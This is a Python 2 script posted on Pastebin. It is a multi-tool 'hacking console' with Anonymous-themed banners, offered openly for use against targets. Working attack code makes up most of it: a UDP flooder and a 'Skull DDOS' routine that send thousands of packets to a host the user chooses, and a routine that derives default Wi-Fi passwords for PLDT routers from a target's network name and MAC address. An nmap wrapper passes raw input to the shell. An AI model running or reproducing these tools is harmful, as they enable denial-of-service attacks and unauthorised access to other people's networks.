Advertisement
Guest User

V.py

a guest
Dec 16th, 2017
125
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 25.38 KB | None | 0 0
  1. import sys
  2. import os
  3. import time
  4. import socket
  5. import random
  6. import wifi
  7. import wireless
  8.  
  9. from threading import Thread
  10.  
  11.  
  12. os.system("clear")
  13. time.sleep(1.1)
  14.  
  15. security = '''\033[05;31m
  16. [=]###############################################[=]
  17.             A D M I N   S E C U R I T Y
  18. [=]###############################################[=]
  19. TYPE YOUR PASSWORD  !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  20. \033[05;36m
  21. [#] small letters only! [#]\033[05;32m
  22.  
  23. [#] type exit to exit console
  24. '''
  25.  
  26. scan = '''\033[05;31m
  27. 001001001010010100100100001001001010001001001000101 [A]
  28.   .;'                   `;,      00001110010100110 [N]
  29. .;'  ,;'             `;,  `;,    00011110010010100 [O]
  30. .;'  ,;'  ,;'     `;,  `;,  `;,   00100111001000010 [N]
  31. ::   ::   :   ( )   :   ::   ::   00010011001001110 [Y]
  32. ':.  ':.  ':. /_\ ,:'  ,:'  ,:'   00011001011100100 [M]
  33. ':.  ':.    /___\   ,:'  ,:'    00101000001100100 [O]
  34.  ':.       /_____\     ,:'      00100100100100101 [U]
  35.           /       \             00100100100100110 [S]
  36. [X=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=X]
  37. '''
  38.  
  39. wifi = '''\033[1;36m
  40. ##############################\033[1;32m
  41. [-]========================[-]     [ANONYMOUS]
  42. [-] W I F I   S C A N N E R[-]   we are anonymous
  43. [-]                        [-]   we are legion
  44. [-]developer: V            [-]   we do not forgive
  45. [-](c)copyright2017        [-]   we do not forget
  46. [-]========================[-]    untied as one\033[1;36m
  47. ##############################\033[1;32m   divided by none
  48.                                   expect us!
  49. '''
  50.  
  51. udp = '''\n\n\t\033[01;32m______________\033[01;36mD'c0d3z\033[01;32m_____________
  52. \t /$$    /$$  /$$$$$$$    /$$$$$$$
  53. \t| $$   | $$ | $$__  $$| | $$___ $$
  54. \t| $$   | $$ | $$  \ $$| | $$   \$$    
  55. \t| $$   | $$ | $$  | $$| | $$$$$$$/
  56. \t| $$   | $$ | $$  | $$| | $$____/
  57. \t| $$   | $$ | $$  | $$| | $$
  58. \t|  $$$$$$$  | $$$$$$$/  | $$
  59. \t \______/   |_______/   |__/
  60. \t(c) copyright 2017
  61. \t______________\033[01;36mFLOODER\033[01;32m_____________'''
  62.  
  63. nmapbanner = '''
  64. ======================================
  65. [:]################################[:]
  66.       N M A P   S C A N N E R
  67. [:]################################[:]
  68. ======================================
  69. '''
  70.  
  71. tools = '''\033[02;32m
  72. 01100010001010000100010000100010011010010100010010001001
  73. ___________                       0000100010011110000
  74. |____   ____|                      00001000101001
  75.     | |   _____   _____   _       00001001011110000
  76.     | |  |  _  | |  _  | | |      00000001000100100010
  77.     | |  | |_| | | |_| | | |__    0111000101
  78.     |_|  |_____| |_____| |____|   000100101001100000
  79.                                   00110
  80. 00100010001001010100000100001000001000100010010001001
  81. [X============================X]
  82.  
  83. \t(c) copyright 2017
  84. \tdate: dec/9/2017         Version 2.3
  85. \tcreated by: V
  86. '''
  87.  
  88. banner1 = '''
  89.                 _________----____
  90.        _____----       ____-     ----_
  91. ___-----       ____-----               \\
  92.   ---_____        ----                 \\
  93.          -----____ |             \033[01;31m_______\033[0;0m)
  94.               ____-\           \033[01;31m/#######\033[0;0m\\
  95.      _______---  __--           \033[01;31m\########\033[0;0m\\
  96. ___---         ---___            \033[01;31m\######/\033[0;0m)\\
  97.    ---_______  ___-- \           \033[01;31m\####/\033[0;0m  /
  98.              --------__   ____      \033[01;31m--\033[0;0m   /\\
  99.                     _____--   \_____/   \_/\\
  100.  | \033[01;31mThe Skull DDOS\033[0;0m      -----|    /_________|
  101.  | (Power Set-2)         _--|   |(_)_/(_)(_)
  102.  |    \033[01;33mv-2.0\033[0;0m                 |   |(_)_/(_)(_)
  103.  | By: D'c0d3z               \            (
  104.  |_______________________     \____________|
  105. \033[01;32m_______________________________________________\033[0;0m
  106. '''
  107.  
  108. choices = '''\033[01;33m
  109.                                0100100011110001010001001001
  110.   .;'                   `;,
  111. .;'  ,;'             `;,  `;,  [-]=================[-]
  112. .;'  ,;'  ,;'     `;,  `;,  `;, [1]:PLDT_HOMEBRO ULTERA
  113. ::   ::   :   ( )   :   ::   :: [2]:HEX CODE LIST
  114. ':.  ':.  ':. /_\ ,:'  ,:'  ,:' [3]:PLDT_HOMEDSL x.x.x.x
  115. ':.  ':.    /___\   ,:'  ,:'  [-]=================[-]
  116.   ':.      /_____\     ,:'    
  117.           /-------\ 0001101011100011000101010000011000100
  118.  
  119. \033[1;31m
  120. [=] Switch Console [=]
  121. \033[1;36m
  122. [4]:Skull 2 DDOS (made by: Kyle Dizon)
  123. [5]:UDP flooder (made by: Kyle Dizon)
  124. \033[1;31m
  125. [=] Web tools [=]
  126. \033[1;36m
  127. [6]:nmap scanner
  128. \033[1;31m
  129. [=] Wifi tools [=]
  130. \033[1;36m
  131. [7]:install wireless tools
  132. [8]:wifi scanner
  133. \033[1;33m
  134.  
  135.  
  136.           [#] Type logout and type exit to exit the console
  137. ____________________________________________________________
  138. '''
  139.  
  140. banner = '''\033[0;32m
  141.      [=============================================]
  142.       _______    _        ____    _______
  143.      /_   _  \ | |      |  _ \ |__   __|
  144.        | |_| |  | |      | | \ \   | |
  145.        |  ___/  | |      | | | |    | |  password
  146.       _| |_     | |___   | |_/ /    | |   converter
  147.      |_____|    |_____|  |____/     |_|  CODED BY: V
  148.      [=============================================]
  149.      00010001010010111000010010101000001010101111100
  150. [=]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[=]
  151. '''
  152. developer = '''\033[1;36m
  153. 000111100101001000111110000010100000010101101000001010100100
  154. ============================================================
  155. Hello my name is V ,Thanks! for using my python console
  156. PLDT PASSWORD CONVERTER NOTE: For Default Password Only
  157.  
  158. Multi tool console with a tool from other developer
  159.  
  160. greetings to: kyle dizon , d-tect developer[s]
  161.  
  162. ============================================================
  163. 000110100101000101010101001010100010010010100101011100100101
  164. '''
  165.  
  166. code = "PLDTWIFI"
  167. code2 = "wlan"
  168. code3 = "HomeBro_"
  169. list = "list"
  170.  
  171. x = 3
  172.  
  173. R = "\033[1;31m"
  174. B = "\033[1;34m"
  175. C = "\033[1;36m"
  176. G = "\033[02;32m"
  177. RESET = "\033[0;0m"
  178. Y = "\033[01;33m"
  179.  
  180. RED = "\033[1;31m"
  181. BLUE = "\033[1;34m"
  182. CYAN = "\033[1;36m"
  183. GREEN = "\033[0;32m"
  184.  
  185.  
  186. def xclr():
  187.    main()
  188.    
  189. def ultera():
  190.  
  191.   os.system("clear")
  192.   time.sleep(1.5)
  193.   os.system("clear")
  194.   print RESET
  195.   time.sleep(1.5)
  196.   print banner
  197.   print R + ("[=]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[=]")
  198.   time.sleep(2.5)
  199.   print developer
  200.   time.sleep(1.5)
  201.   print R + ("[=]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[=]")
  202.   time.sleep(1.5)
  203.   print R + ("[Note]:") + G + (" Remove ':' of the last six mac add before you enter") + RESET
  204.   time.sleep(0.5)
  205.   e = raw_input("\n[+] Target ESSID/Wifi name: ")
  206.   time.sleep(0.5)
  207.   mac = raw_input("[+] Enter the last six BSSID: ")
  208.   time.sleep(1.0)
  209.   print G + ("\n\n[+] ") + RESET + ("Password found for \033[01;32m%s" % (e))
  210.   time.sleep(1.0)
  211.   print RESET + ("\n\n\nPassword:") + G + (" %s%s" % (code3, mac))
  212.   print RESET + ("or\nPassword:") + G + (" %s%s" % (code, mac))
  213.   print RESET
  214.   time.sleep(1.0)
  215.   bck = raw_input("\n\n[*] Do you want to exit. [y/n] : ")
  216.   if bck == 'y' or bck == 'Y':
  217.     time.sleep(0.5)
  218.     print C + ("\n[*] shutdown")
  219.     time.sleep(1.0)
  220.     sys.exit
  221.  
  222.   else:
  223.     choice()
  224.  
  225. def UDP():
  226.     os.system("clear")
  227.     print udp
  228.     def flood():
  229.         try:
  230.             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  231.             sock.connect((target, port))
  232.             ip = socket.gethostbyname(target)
  233.             print C + ("\t[+] Flooding to %s:%s with %s packets" % (ip, port, packet))
  234.             sock.send("GET / %s HTTP/1.1\r\n" % (packet))
  235.             sock.send("HOST: " + target + "\r\n\r\n");
  236.             sock.close()
  237.         except socket.error as msg:
  238.             print R
  239.             print(str(msg))
  240.         except KeyboardInterrupt:
  241.             print R + ("\n\t[-] User aborted...") + RESET
  242.             time.sleep(1.0)
  243.             back = raw_input("\t[+] Do you want to get back to main program? [Y/n]: ")
  244.             if back == 'Y' or back == 'y':
  245.                 time.sleep(0.5)
  246.                 os.system("clear")
  247.                 choice()
  248.             elif back == 'N' or back == 'n':
  249.                 print Y + ("\n\t[") + R + ("X") + Y + ("]") + Y + (" Bye bye!...") + RESET
  250.                 time.sleep(1.0)
  251.                 os.system("clear")
  252.                 sys.exit()
  253.             else:
  254.                 print R + ("\t[-] Error")
  255.                 time.sleep(1.0)
  256.                 print Y + ("\n\t[") + R + ("X") + Y + ("]") + Y + (" Bye bye!...") + RESET
  257.                 time.sleep(1.0)
  258.                 os.system("clear")
  259.                 sys.exit()
  260.  
  261.     def flood2():
  262.         try:
  263.             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  264.             port = random.randint(1, 65535)
  265.             sock.connect((target, port))
  266.             ip = socket.gethostbyname(target)
  267.             print C + ("\t[+] Flooding to %s:%s with %s packets" % (ip, port, packet))
  268.             sock.send("GET / %s HTTP/1.1\r\n" % (packet))
  269.             sock.send("HOST: " + target + "\r\n\r\n");
  270.             sock.close()
  271.         except socket.error as msg:
  272.             print R
  273.             print(str(msg))
  274.         except KeyboardInterrupt:
  275.             print R + ("\n\t[-] User aborted...") + RESET
  276.             time.sleep(1.0)
  277.             back = raw_input("\t[+] Do you want to get back to main program? [Y/n]: ")
  278.             if back == 'Y' or back == 'y':
  279.                 time.sleep(0.5)
  280.                 os.system("clear")
  281.                 choice()
  282.             elif back == 'N' or back == 'n':
  283.                 print Y + ("\n\t[") + R + ("X") + Y + ("]") + Y + (" Bye bye!...") + RESET
  284.                 time.sleep(1.0)
  285.                 os.system("clear")
  286.                 sys.exit()
  287.             else:
  288.                 print R + ("\t[-] Error")
  289.                 time.sleep(1.0)
  290.                 print Y + ("\n\t[") + R + ("X") + Y + ("]") + Y + (" Bye bye!...") + RESET
  291.                 time.sleep(1.0)
  292.                 os.system("clear")
  293.                 sys.exit()
  294.    
  295.     print RESET
  296.     time.sleep(0.5)
  297.     target = raw_input("\n\t\033[02;32m[*] Hostname or IP: ")
  298.     packet = input("\t\033[02;32m[*] Packets: ")
  299.     package = raw_input("\t\033[02;32m[*] Do you want to random port? [y/N]: ")
  300.     if package == 'y' or package == 'Y':
  301.         time.sleep(0.5)
  302.         print C + ("\n\t[*] The UDP flood start...")
  303.         print R + ("\t[D'c0d3z]:[WARNING]:[") + Y + ("!") + R + ("]:\n") + G + ("\tI take no responsibility for the use of this program.\n")
  304.         for x in range(1, 9999):
  305.             flood2()
  306.     elif package == 'n' or package == 'N':
  307.         port = input("\t[*] Port: ")
  308.         time.sleep(0.5)
  309.         print C + ("\n\t[*] The UDP flood start...")
  310.         print R + ("\t[D'c0d3z]:[WARNING]:[") + Y + ("!") + R + ("]:\n") + G + ("\tI take no responsibility for the use of this program.\n")
  311.         for x in range(1, 9999):
  312.             flood()
  313.     else:
  314.         port = input("\t[*] Port: ")
  315.         time.sleep(0.5)
  316.         print C + ("\n\t[*] The UDP flood start...")
  317.         print R + ("\t[D'c0d3z]:[WARNING]:[") + Y + ("!") + R + ("]:\n") + G + ("\tI take no responsibility for the use of this program.\n")
  318.         for x in range(1, 9999):
  319.             flood()
  320.  
  321. def adminsecurity():
  322.        
  323.      os.system("clear")
  324.      print security
  325.      print ("\n")
  326.      pas = raw_input("\t|password| :  ")
  327.      if pas == 'anonymous' or pas == 'admin':
  328.        print ("\n")
  329.        print R + ("[]########################################################[]") + G
  330.        print ("\n")
  331.        print ("[=]###################[=]")
  332.        print ("    |access granted|")
  333.        print ("[=]###################[=]")
  334.        time.sleep(2.5)
  335.        os.system("clear")
  336.        choice()
  337.  
  338.      elif pas == 'exit' or pas == 'Exit':
  339.        os.system("clear")
  340.        print C
  341.        print("thanks for using my python console ,hope you like it")
  342.        print("001110010100010000010000010010001000010001")
  343.        sys.exit()
  344.  
  345.      else:
  346.        print ("\n")
  347.        print R + ("[]########################################################[]") + R
  348.        print ("\n")
  349.        print ("[=]###################[=]")
  350.        print ("     |access denied|")
  351.        print ("      >please wait<")
  352.        print ("[=]###################[=]")
  353.        time.sleep(2.5)
  354.        time.sleep(1.5)
  355.        os.system("clear")
  356.        print ("Loading...")
  357.        print ("[][][]")
  358.        time.sleep(1.5)
  359.        os.system("clear")
  360.        print ("Loading...")
  361.        print ("[][][][][][][]")
  362.        time.sleep(1.2)
  363.        os.system("clear")
  364.        print ("Loading...")
  365.        print ("[][][][][][][][][][][]")
  366.        time.sleep(1.5)
  367.        print ("Done!")
  368.        time.sleep(2.5)
  369.        main()
  370.  
  371. def scanner():
  372.     os.system("clear")
  373.     os.system("clear")
  374.     os.system("clear")
  375.     time.sleep(2.0)
  376.     os.system("clear")
  377.     time.sleep(2.5)
  378.     time.sleep(1.0)
  379.     time.sleep(0.5)
  380.     iwlist()
  381.  
  382. def iwlist():
  383.  
  384.             os.system("clear")
  385.             print wifi
  386.             time.sleep(1.0)
  387.             print  ("\033[0;33m[=]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[=]")
  388.             print scan
  389.             print  ("\033[0;33m[=]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[=]")
  390.             time.sleep(1.1)
  391.             print("\n")
  392.             print Y + ("\n[") + R + ("*") + Y + ("]") + G + (" Full scan...") + RESET
  393.             time.sleep(0.5)
  394.             i = raw_input("\n[+] Enter Interface: ")
  395.             time.sleep(0.5)
  396.             print Y + ("[") + R + ("*") + Y + ("]") + G + (" Scanning %s...\n" % (i))
  397.             time.sleep(2.0)
  398.             print RESET
  399.             os.system("iwlist %s scan" % (i))
  400.             time.sleep(1.0)
  401.             print Y + ("\n[") + R + ("-") + Y + ("]") + G + (" End of scan.") + RESET
  402.             time.sleep(1.0)
  403.             bck = raw_input("\n[+] Press 'y' to get back to Scanner. [y/n]: ")
  404.             if bck == 'y' or bck == 'Y':
  405.                 time.sleep(0.5)
  406.                 print C + ("\n[+] Going back to Scanner")
  407.                 time.sleep(1.0)
  408.                 scanner()
  409.             elif bck == 'n' or bck == 'N':
  410.                 time.sleep(0.5)
  411.                 print C + ("\n[+] Going back to main program")
  412.                 time.sleep(1.0)
  413.                 main()
  414.             else:
  415.                 print R + ("[!] Error\n\n[-]") + G + (" Shutting down...") + RESET
  416.                 time.sleep(1.5)
  417.                 os.system("clear")
  418.                 sys.exit()
  419.  
  420. def hexcode():
  421.  
  422.   os.system("clear")
  423.   time.sleep(1.5)
  424.   os.system("clear")
  425.   print RESET
  426.   time.sleep(1.5)
  427.   print banner
  428.   print R + ("[=]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[=]")
  429.   time.sleep(2.5)
  430.   print developer
  431.   time.sleep(1.5)
  432.   print R + ("[=]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[=]")
  433.   time.sleep(1.5)
  434.   print R + ("\n[===========]")
  435.   print Y + ("  printing")
  436.   print Y + (" please wait")
  437.   print R + ("[===========]\n")
  438.   time.sleep(2.5)
  439.    
  440.   print Y + ("    0 = f") + R + ("  [A]")
  441.   time.sleep(2.0)
  442.   print Y + ("    1 = e") + R + ("  [N]")
  443.   time.sleep(2.0)
  444.   print Y + ("    2 = d") + R + ("  [O]")
  445.   time.sleep(2.0)
  446.   print Y + ("    3 = c") + R + ("  [N]")
  447.   time.sleep(2.0)
  448.   print Y + ("    4 = b") + R + ("  [Y]")
  449.   time.sleep(2.0)
  450.   print Y + ("    5 = a") + R + ("  [M]")
  451.   time.sleep(2.0)
  452.   print Y + ("    6 = 9") + R + ("  [O]")
  453.   time.sleep(2.0)
  454.   print Y + ("    7 = 8") + R + ("  [U]")
  455.   time.sleep(2.0)
  456.   print Y + ("    8 = 7") + R + ("  [S]")
  457.   time.sleep(2.0)
  458.   print Y + ("    9 = 6")
  459.   time.sleep(2.0)
  460.   print Y + ("    c = 3") + R + ("  ~( V )~ ")
  461.   time.sleep(2.0)
  462.   print Y + ("    d = 2")
  463.   time.sleep(2.0)
  464.   print Y + ("    e = 1") + R + ("  [coded by: V]")
  465.   time.sleep(2.0)
  466.   print Y + ("    f = 0") + R + ("  [Thanks for using my python console]")
  467.   time.sleep(2.5)
  468.   print R + ("\n\nPRINTING DONE!")
  469.   print Y + ("do you want to exit. [y/n]")
  470.    
  471.   E = raw_input("\033[1;31m  crack~usr#: ")
  472.  
  473.   if E == 'y' or E == 'Y':
  474.    time.sleep(1.5)
  475.    sys.exit()
  476.   elif E == 'n' or E == 'N':
  477.    choice()
  478.  
  479. def pldthomedsl():
  480.  
  481.   os.system("clear")
  482.   time.sleep(1.5)
  483.   os.system("clear")
  484.   print RESET
  485.   time.sleep(1.5)
  486.   print banner
  487.   print R + ("[=]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[=]")
  488.   time.sleep(2.5)
  489.   print developer
  490.   time.sleep(1.5)
  491.   print R + ("[=]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[=]")
  492.   time.sleep(1.5)
  493.   print R + ("[Note]:") + G + (" Remove ':' of the last six mac add before you enter") + RESET
  494.   time.sleep(0.5)
  495.   e = raw_input("\n[+] Target ESSID/Wifi name: ")
  496.   time.sleep(0.5)
  497.   mac = raw_input("[+] Enter the last six BSSID: ")
  498.   time.sleep(1.0)
  499.   print G + ("\n\n[+] ") + RESET + ("Password found for \033[01;32m%s" % (e))
  500.   time.sleep(1.0)
  501.   print RESET + ("\n\n\nPassword:") + G + (" %s%s" % (code2, mac))
  502.   print RESET + ("or\nPassword:") + G + (" %s%s" % (code, mac))
  503.   print RESET
  504.   time.sleep(1.0)
  505.   bck = raw_input("\n\n[*] hit enter to exit. [y/n] : ")
  506.   if bck == 'y' or bck == 'Y':
  507.    time.sleep(0.5)
  508.    print C + ("\n[*] Shutdown")
  509.    time.sleep(1.0)
  510.    sys.exit()
  511.  
  512.   elif bck == 'n' or bck == 'N':
  513.    choice()
  514.  
  515. def skull():
  516.  
  517.     os.system("clear")
  518.     time.sleep(1.5)
  519.     os.system("clear")
  520.     time.sleep(1.5)
  521.    
  522.     def start():
  523.       try:
  524.         set1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  525.         set2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  526.         serverIP = socket.gethostbyname(targetsite)
  527.         port1 = random.randint(1, 1024)
  528.         port2 = random.randint(1, 65535)
  529.         set1.connect((targetsite, port1))
  530.         set2.connect((targetsite, port2))
  531.         print ("Attacking to {} - tcp-port:{} udp-port:{} with {} packets".format(serverIP, port1, port2, packet))
  532.         set1.send("GET / {} HTTP/1.1\r\n {} \r\n".format(packet, user_agent))
  533.         set1.send("HOST: " + targetsite + "\r\n\r\n" + user_agent + "\r\n");
  534.         set2.send("GET / {} HTTP/1.1\r\n {} \r\n".format(packet, user_agent))
  535.         set2.send("HOST: " + targetsite + "\r\n\r\n" + user_agent + "\r\n");
  536.         set1.close()
  537.         set2.close()
  538.       except socket.error as (msg):
  539.         print "-" * 47 + R
  540.         print (str(msg))
  541.         print RESET + "-" * 47
  542.         sys.exit()
  543.       except KeyboardInterrupt:
  544.         print ""
  545.         print "-" * 47 + R
  546.         print ("User Shutdown")
  547.         print RESET + "-" * 47
  548.         sys.exit()
  549.  
  550.     user_agent = ("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us; Silk/1.1.0-80) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 Silk-Accelerated=true")
  551.     os.system("clear")
  552.     time.sleep(1.0)
  553.     print banner1
  554.     print ("warning you can not back in main program\n")
  555.     time.sleep(0.5)
  556.     targetsite = raw_input("[*] Enter target website/IP: ")
  557.     packet = input("[*] Enter packets number to send: ")
  558.     print G + "-" * 47
  559.     print R + "-" * 47 + G
  560.     print ("[*] Start attacking target: {}...".format(targetsite)) + RESET
  561.     for x in range(1, 999999):
  562.        start()
  563.  
  564. def nmapscan():
  565.     os.system("clear")
  566.     os.system("clear")
  567.     time.sleep(2.5)
  568.     os.system("clear")
  569.     print nmapbanner
  570.     print G + ("\nPlease get IP address or website address of your target\n")
  571.     print R + ("warning choose your mode \n[1]=|type commamd|  = type your whole command\n[2]=|auto execute|  = very simple and easy to use\n") + G
  572.     scan = raw_input("|mode| :  ")
  573.     if scan == '1':
  574.        os.system("clear")
  575.        time.sleep(1.1)
  576.        os.system("clear")
  577.        print nmapbanner
  578.        print C + ("\n|mode| = 1")
  579.        print Y + ("mode 1 is for nmap users only")
  580.        print G + ("type your whole command")
  581.        cmd = raw_input("|command| :  ")
  582.        print("[##########################################]")
  583.        os.system("%s" % (cmd))
  584.        print("[##########################################]")
  585.        time.sleep(1.5)
  586.        fawkes = raw_input("\n|exit [y/n] :  ")
  587.        if fawkes == 'y' or fawkes == 'Y':
  588.           time.sleep(1.1)
  589.           os.system("clear")
  590.           sys.exit()
  591.        elif fawkes == 'n' or fawkes == 'N':
  592.           time.sleep(1.1)
  593.           os.system("clear")
  594.           choice()
  595.        else:
  596.           os.system("clear")
  597.           time.sleep(1.1)
  598.           nmapscan()
  599.     if scan == '2':
  600.       os.system("clear")
  601.       time.sleep(1.1)
  602.       os.system("clear")
  603.       print nmapbanner
  604.       print C + ("\n|mode| = 2")
  605.       print G + ("type the website address and your single argument")
  606.       target = raw_input("|web| :  ")
  607.       argument = raw_input("|args| :  ")
  608.       print("[###########################################]")
  609.       os.system("nmap %s %s" % (argument, target))
  610.       print("[###########################################]")
  611.       time.sleep(1.5)
  612.       ven = raw_input("\n|exit [y/n]| :  ")
  613.       if ven == 'y' or ven == 'Y':
  614.          time.sleep(1.1)
  615.          os.system("clear")
  616.          sys.exit()
  617.       elif ven == 'n' or ven == 'N':
  618.          time.sleep(1.1)
  619.          os.system("clear")
  620.          choice()
  621.       else:
  622.          os.system("clear")
  623.          time.sleep(1.1)
  624.          nmapscan()
  625.  
  626. def choice():
  627.  
  628.     time.sleep(1.5)
  629.     os.system("clear")
  630.     print ("Loading...")
  631.     print ("[][][]")
  632.     time.sleep(1.5)
  633.     os.system("clear")
  634.     print ("Loading...")
  635.     print ("[][][][][][][]")
  636.     time.sleep(1.2)
  637.     os.system("clear")
  638.     print ("Loading...")
  639.     print ("[][][][][][][][][][][]")
  640.     time.sleep(1.5)
  641.     print ("Done!")
  642.     time.sleep(2.5)
  643.     os.system("clear")
  644.     time.sleep(1.1)
  645.     print R + ("[=]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[=]")
  646.     print tools
  647.     print R + ("[=]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[=]")
  648.     print choices
  649.     PLDT = raw_input("\n\033[0;32m   crack-usr~#: ")
  650.     if PLDT == '1':
  651.       time.sleep(1.5)
  652.       os.system("clear")
  653.       print ("Loading...")
  654.       print ("[][][]")
  655.       time.sleep(1.5)
  656.       os.system("clear")
  657.       print ("Loading...")
  658.       print ("[][][][][][][]")
  659.       time.sleep(1.2)
  660.       os.system("clear")
  661.       print ("Loading...")
  662.       print ("[][][][][][][][][][][]")
  663.       time.sleep(1.5)
  664.       print ("Done!")
  665.       time.sleep(2.5)
  666.       ultera()
  667.     if PLDT == 'nmap':
  668.       nmapscan()
  669.     if PLDT == '2':
  670.       time.sleep(1.5)
  671.       os.system("clear")
  672.       print ("Loading...")
  673.       print ("[][][]")
  674.       time.sleep(1.5)
  675.       os.system("clear")
  676.       print ("Loading...")
  677.       print ("[][][][][][][]")
  678.       time.sleep(1.2)
  679.       os.system("clear")
  680.       print ("Loading...")
  681.       print ("[][][][][][][][][][][]")
  682.       time.sleep(1.5)
  683.       print ("Done!")
  684.       time.sleep(2.5)
  685.       hexcode()
  686.     if PLDT == '3':
  687.       time.sleep(1.5)
  688.       os.system("clear")
  689.       print ("Loading...")
  690.       print ("[][][]")
  691.       time.sleep(1.5)
  692.       os.system("clear")
  693.       print ("Loading...")
  694.       print ("[][][][][][][]")
  695.       time.sleep(1.2)
  696.       os.system("clear")
  697.       print ("Loading...")
  698.       print ("[][][][][][][][][][][]")
  699.       time.sleep(1.5)
  700.       print ("Done!")
  701.       time.sleep(2.5)
  702.       pldthomedsl()
  703.     if PLDT == '4':
  704.       time.sleep(1.5)
  705.       os.system("clear")
  706.       print ("Loading...")
  707.       print ("[][][]")
  708.       time.sleep(1.5)
  709.       os.system("clear")
  710.       print ("Loading...")
  711.       print ("[][][][][][][]")
  712.       time.sleep(1.2)
  713.       os.system("clear")
  714.       print ("Loading...")
  715.       print ("[][][][][][][][][][][]")
  716.       time.sleep(1.5)
  717.       print ("Done!")
  718.       time.sleep(2.5)
  719.       skull()
  720.     if PLDT == '5':
  721.       time.sleep(1.5)
  722.       os.system("clear")
  723.       print ("Loading...")
  724.       print ("[][][]")
  725.       time.sleep(1.5)
  726.       os.system("clear")
  727.       print ("Loading...")
  728.       print ("[][][][][][][]")
  729.       time.sleep(1.2)
  730.       os.system("clear")
  731.       print ("Loading...")
  732.       print ("[][][][][][][][][][][]")
  733.       time.sleep(1.5)
  734.       print ("Done!")
  735.       time.sleep(2.5)
  736.       UDP()
  737.  
  738.     if PLDT == '6':
  739.       time.sleep(1.5)
  740.       os.system("clear")
  741.       print ("Loading...")
  742.       print ("[][][]")
  743.       time.sleep(1.5)
  744.       os.system("clear")
  745.       print ("Loading...")
  746.       print ("[][][][][][][]")
  747.       time.sleep(1.2)
  748.       os.system("clear")
  749.       print ("Loading...")
  750.       print ("[][][][][][][][][][][]")
  751.       time.sleep(1.5)
  752.       print ("Done!")
  753.       time.sleep(2.5)
  754.       nmapscan()
  755.      
  756.     if PLDT == '7':
  757.       time.sleep(1.5)
  758.       os.system("clear")
  759.       print ("Loading...")
  760.       print ("[][][]")
  761.       time.sleep(1.5)
  762.       os.system("clear")
  763.       print ("Loading...")
  764.       print ("[][][][][][][]")
  765.       time.sleep(1.2)
  766.       os.system("clear")
  767.       print ("Loading...")
  768.       print ("[][][][][][][][][][][]")
  769.       time.sleep(1.5)
  770.       print ("Done!")
  771.       time.sleep(2.5)
  772.       print ("\033[1;31mwarning you need to use debian os")
  773.       warn = raw_input("do you want to continue? [y/N]\n > ")
  774.       if warn == 'y' or warn == 'Y':
  775.           print("installing...")
  776.           time.sleep(2.0)
  777.           os.system("apt-get update")
  778.           time.sleep(2.5)
  779.           os.system("apt-get install wireless-tools")
  780.           time.sleep(1.1)
  781.           os.system("apt-list wireless-tools")
  782.           time.sleep(1.0)
  783.           ins = raw_input("do you want to exit? [y/N]\n    > ")
  784.           if ins == 'y' or ins == 'Y':
  785.             sys.exit()
  786.            
  787.           elif ins == 'n' or ins == 'N':
  788.             time.sleep(1.1)
  789.             main()
  790.            
  791.       elif warn == 'n' or warn == 'N':
  792.           time.sleep(1.1)
  793.           main()
  794.          
  795.     if PLDT == '8':
  796.       time.sleep(1.5)
  797.       os.system("clear")
  798.       print ("Loading...")
  799.       print ("[][][]")
  800.       time.sleep(1.5)
  801.       os.system("clear")
  802.       print ("Loading...")
  803.       print ("[][][][][][][]")
  804.       time.sleep(1.2)
  805.       os.system("clear")
  806.       print ("Loading...")
  807.       print ("[][][][][][][][][][][]")
  808.       time.sleep(1.5)
  809.       print ("Done!")
  810.       time.sleep(2.5)
  811.       scanner()
  812.      
  813.     if PLDT == 'logout' or PLDT == "Logout":
  814.       time.sleep(1.5)
  815.       os.system("clear")
  816.       print ("Loading...")
  817.       print ("[][][]")
  818.       time.sleep(1.5)
  819.       os.system("clear")
  820.       print ("Loading...")
  821.       print ("[][][][][][][]")
  822.       time.sleep(1.2)
  823.       os.system("clear")
  824.       print ("Loading...")
  825.       print ("[][][][][][][][][][][]")
  826.       time.sleep(1.5)
  827.       print ("Done!")
  828.       time.sleep(2.5)
  829.       os.system("clear")
  830.       time.sleep(1.1)
  831.       os.system("clear")
  832.       time.sleep(1.1)
  833.       os.system("clear")
  834.       time.sleep(1.1)
  835.       os.system("clear")
  836.       time.sleep(1.1)
  837.       os.system("clear")
  838.       adminsecurity()
  839.  
  840.     else:
  841.       time.sleep(1.5)
  842.       os.system("clear")
  843.       print ("Loading...")
  844.       print ("[][][]")
  845.       time.sleep(1.5)
  846.       os.system("clear")
  847.       print ("Loading...")
  848.       print ("[][][][][][][]")
  849.       time.sleep(1.2)
  850.       os.system("clear")
  851.       print ("Loading...")
  852.       print ("[][][][][][][][][][][]")
  853.       time.sleep(1.)
  854.       print ("Done Loading with errors")
  855.       print ("system failure\n")
  856.       print ("\n\033[1;31m unknown command")
  857.       time.sleep(2.5)
  858.       print (" > please wait")
